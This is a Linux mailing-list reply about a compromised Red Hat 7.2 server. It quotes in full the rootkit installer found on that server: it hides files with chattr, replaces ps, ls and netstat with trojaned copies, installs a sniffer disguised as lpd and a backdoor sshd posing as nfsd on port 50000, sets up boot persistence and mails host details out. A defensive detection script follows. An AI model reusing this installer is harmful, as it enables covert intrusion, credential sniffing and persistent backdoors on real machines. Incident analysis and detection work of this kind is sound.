Reinstall everything, then register with rhn_register at RH Network, and once you have enrolled your system with them you can use "up2date -u" for up-to-date updates. It looks like Windoze, but it works fine. If you have connection problems, let it fetch the headers, which it puts in /var/spool/up2date (you have about 200 MB of updates to download), look for a nearby mirror of updates.redhat.com (e.g. ftp.ubbcluj.ro), fetch from there the packages matching the headers, put them in /var/spool/up2date and restart "up2date -u".
Mine too: they got in through the wu-ftpd from RH 7.2, but the rootkit was for another system, so I found it after about 3 hours (I was waiting for "up2date -u" to finish with the services still running, dumb as I was :) when ps, ls, netstat stopped working. So I quickly brought the respective apps over from another system, and surprise... nfsd -q -p 50000, which was a modified sshd. I looked through the directories and found in /var/ftp/ a directory that wasn't there the last time I looked. Searching through the files in it, I came across a path to some library directory that looked roughly like this:

. .. .lib .tooz

In .tooz was the install file:

#private version from cur / not hacked by lamme assz as Em|nem or others!
#phear my reverge all u mother fuckers
# rk made ONLY 4 my friends ond ONLY 4 fun
#!/bin/sh
unset HISTFILE
chattr -iau /usr/src/linux/arch/alpha/lib/.lib/
chattr -iau /bin/ps
chattr -iau /bin/ls
chattr -iau /bin/netstat
chattr -iau /bin/lpd
rm -rf /etc/ssh*
clear
mkdir -p /usr/src/linux/arch/alpha/lib/.lib
sh sysinfo1 > new-host
sh ssh_random_key
mv .1proc /usr/src/linux/arch/alpha/lib/.lib/
mv .1addr /usr/src/linux/arch/alpha/lib/.lib/
mv .1file /usr/src/linux/arch/alpha/lib/.lib/
mv /bin/ps /usr/src/linux/arch/alpha/lib/.lib/.ps
mv /bin/ls /usr/src/linux/arch/alpha/lib/.lib/.ls
chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1proc
chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1addr
chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1file
chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ps
chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ls
mv ps /bin/ps
mv ls /bin/ls
mv /bin/netstat /usr/src/linux/arch/alpha/lib/.lib/
mv netstat /bin/netstat
chown root.root /bin/ls
chown root.root /bin/ps
chown root.root /bin/netstat
mv linsniffer /bin/lpd
rm -rf /etc/ssh*
rm -rf /usr/man/man8/rpc.rstatd.8
rm -rf /usr/sbin/rpc.rstatd
rm -rf /usr/sbin/rpc*
lpd &
./lpd
mv sshd /bin/nfsd
mv -f sshd_config /etc/
mv -f ssh_host_key /etc/
mv -f ssh_random_seed /etc/
mv -f ssh_host_key.pub /etc/
rm -rf ssh_random_key
chattr +iau /bin/nfsd
chattr +iau /etc/sshd_config
chattr +iau /etc/ssh_host_key
chattr +iau /etc/ssh_random_seed
chattr +iau /etc/ssh_host_key.pub
nfsd -q -p 50000
echo "nfsd -q -p 50000" >>/etc/rc.d/rc.sysinit
echo "nfsd -q -p 50000" >>/etc/rc.d/init.d/inet
./sysinfo1 > new-host |mail -s "root6666" [EMAIL PROTECTED]
cat new-host |mail -s
#-----done with ssh----
killall -9 portmap
killall rpc.statd
rm -f /usr/sbin/rpc.statd
echo "ftp">>/etc/ftpusers
echo "root">>/etc/ftpusers
cat /proc/cpuinfo
mv pwd /dev/capi20.20
rm -f sysinfo1
rm -f sysinfo
rm -f new-host
rm -f sshd
cd ..
rm -rf s.tgz
clear
echo "****************************7.1***************************"
echo "Oki"
echo "***********************SpUrKaTu&TrUnKS********************"

There was also a .1addr file:

2 194.105
3 6666
3 6667
3 54789
3 31337
3 6668
3 6669
3 6666
2 194.102.233
2 209.142.209.161
2 217.10
2 213.233

I kept the files, because you never know; among them there are also: hideps install lpd sense string tcp.log utils wipe .1addr .1file .1proc .ls netstat .ps

That's about all I found. In general, it's good to have original copies of ls, ps, netstat.

Good luck

On Fri, 24 May 2002, Gabriel Stoicea wrote:

> I'm running an RH 7.2 system on which I have detected an intrusion.
> I realized this because certain commands were not working correctly.
> 1. I repaired the compromised packages (net-tools, fileutils and procps) with
> rpm -U --force ...
> 2. I downloaded chkrootkit, and chkproc tells me that 2 hidden processes
> are running:
> - You have 1 process hidden for readdir command
> - You have 1 process hidden for ps command
> 3. chkrootkit "freezes" during the check at the position
> Checking 'aliens'...
> 4. When I reboot the PC it gives me some errors when unmounting the /usr partition
> --> Illegal seek
> 5. When I boot, a few messages appear saying that some program is shareware
> and I don't know what else... and that it listens on port 7000
> 6. In boot.log the following line appears
> ... Starting backdoor daemon... Done, pid=...
> Now I ask you:
> - could other packages be compromised besides the ones named?
> - what's with those hidden processes, and how do I get rid of them?
> - why does chkrootkit freeze?
> - if it really is a backdoor, how do I get rid of it?
>
> Hoping I'm not annoying you with such a long mail, thank you
> in advance for the help.
> Gaby
>
>
> ---
> To unsubscribe, send mail to
> [EMAIL PROTECTED] with the subject 'unsubscribe rlug'.
> RULES, archives and other information: http://www.lug.ro/mlist/
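The thread's recovery steps boil down to one idea: compare what a trusted toolset reports with what the system's own ps, ls and netstat report, and treat any disagreement (plus files carrying the immutable/append-only flags the install script sets with chattr +iau) as a lead. The script below is an added example, not code from either poster or from chkrootkit; it implements that cross-check on constructed sample outputs embedded inline (the /proc listing, ps -e, netstat -an and lsattr lines are made up for the example and were not captured from the compromised machine), so in practice you would feed it the real outputs from binaries run off trusted media.

```python
import re

# Constructed sample data (not from the machine in the post): the `ls /proc`
# and `ps -e` listings disagree about one PID, the trusted and suspect
# `netstat -an` outputs disagree about one listening port, and two files carry
# the immutable (i) / append-only (a) flags a stock installation would not set.
PROC_LISTING = "1 2 3 4242 512 513 acpi cpuinfo meminfo net self version"
PS_OUTPUT = """  PID TTY          TIME CMD
    1 ?        00:00:04 init
    2 ?        00:00:00 keventd
    3 ?        00:00:00 kapmd
  512 ?        00:00:00 syslogd
  513 ?        00:00:00 klogd
"""
TRUSTED_NETSTAT = """Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:50000           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
tcp        0      0 192.0.2.10:22           198.51.100.7:40112      ESTABLISHED
"""
SUSPECT_NETSTAT = """Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
tcp        0      0 192.0.2.10:22           198.51.100.7:40112      ESTABLISHED
"""
LSATTR_OUTPUT = """------------- /bin/ps
------------- /bin/ls
----ia------- /bin/nfsd
------------- /bin/netstat
----ia------- /etc/sshd_config
"""


def pids_from_proc_listing(listing):
    """PIDs are the purely numeric directory names in /proc (readdir view)."""
    return {int(tok) for tok in listing.split() if tok.isdigit()}


def pids_from_ps(ps_output):
    """PIDs from the first column of `ps -e`, skipping the header line."""
    pids = set()
    for line in ps_output.splitlines()[1:]:
        fields = line.split()
        if fields and fields[0].isdigit():
            pids.add(int(fields[0]))
    return pids


def hidden_processes(proc_listing, ps_output):
    """PIDs present in /proc but missing from ps: the same disagreement that
    chkproc reports as 'process hidden for ps command'."""
    return sorted(pids_from_proc_listing(proc_listing) - pids_from_ps(ps_output))


# tcp lines must be in LISTEN state; udp lines have no state column at all.
_LISTENER = re.compile(r"^(tcp|udp)\s+\d+\s+\d+\s+\S+:(\d+)\s+\S+(\s+LISTEN)?\s*$")


def listening_ports(netstat_output):
    """Local ports with a listener according to `netstat -an` output."""
    ports = set()
    for line in netstat_output.splitlines():
        m = _LISTENER.match(line)
        if m:
            ports.add(int(m.group(2)))
    return ports


def hidden_ports(trusted_output, suspect_output):
    """Listeners the trusted netstat shows but the system's own netstat hides."""
    return sorted(listening_ports(trusted_output) - listening_ports(suspect_output))


def files_with_immutable_flags(lsattr_output):
    """Paths whose lsattr flag string carries 'i' (immutable) or 'a' (append-only).
    Splitting on the first whitespace tolerates the varying flag-string width."""
    flagged = []
    for line in lsattr_output.splitlines():
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        flags, path = parts
        if "i" in flags or "a" in flags:
            flagged.append(path)
    return flagged


if __name__ == "__main__":
    print("hidden PIDs:", hidden_processes(PROC_LISTING, PS_OUTPUT))
    print("hidden listening ports:", hidden_ports(TRUSTED_NETSTAT, SUSPECT_NETSTAT))
    print("files with i/a flags:", files_with_immutable_flags(LSATTR_OUTPUT))
```

On the sample data this flags PID 4242, port 50000 and the two chattr'd files, which is exactly the kind of result the original poster's chkproc output and the nfsd-on-50000 discovery point at. The comparison only works if one side of it is trustworthy, so the trusted listings should come from binaries copied from a clean system or from a rescue CD, never from the suspect box's own /bin.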
